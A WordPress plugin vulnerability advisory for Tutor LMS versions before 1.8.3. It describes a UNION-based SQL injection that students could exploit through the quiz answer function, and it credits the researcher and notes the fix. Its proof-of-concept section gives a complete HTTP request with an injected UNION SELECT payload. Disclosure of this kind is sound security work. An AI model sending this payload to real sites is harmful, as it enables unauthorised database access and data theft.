WordPress Plugin Vulnerabilities
Tutor LMS < 1.8.3 - SQL Injection via tutor_answering_quiz_question/get_answer_by_id
Description
The tutor_answering_quiz_question/get_answer_by_id function pair from the plugin was vulnerable to UNION based SQL injection that could be exploited by students.
Proof of Concept
POST /courses/first-class/tutor_quiz/test/ HTTP/1.1 Host: [URL] Content-Length: 413 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: [URL] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: [URL] Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: [COOKIES] Connection: close _wpnonce=[REPLACE_WITH_VALID_NONCE]&_wp_http_referer=%2Fcourses%2Ffirst-class%2Ftutor_quiz%2Ftest%2F&attempt_id=1&tutor_action=tutor_answering_quiz_question&attempt%5B1%5D%5Bquiz_question_ids%5D%5B%5D=&attempt%5B1%5D%5Bquiz_question%5D%5B1%5D=1 UNION select 1,2,3,version(),5,6,7,8,9,10.11,12,13;--&attempt%5B1%5D%5Bquiz_question_ids%5D%5B%5D=2&attempt%5B1%5D%5Bquiz_question%5D%5B2%5D=5&quiz_answer_submit_btn=quiz_answer_submit Then send a GET request to http://[URL]/dashboard/my-quiz-attempts/attempts-details/?attempt_id=1
Affects Plugins
Fixed in version 1.8.3
References
Classification
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-03-15 (about 2 years ago)
Added
2021-03-15 (about 2 years ago)
Last Updated
2021-03-20 (about 2 years ago)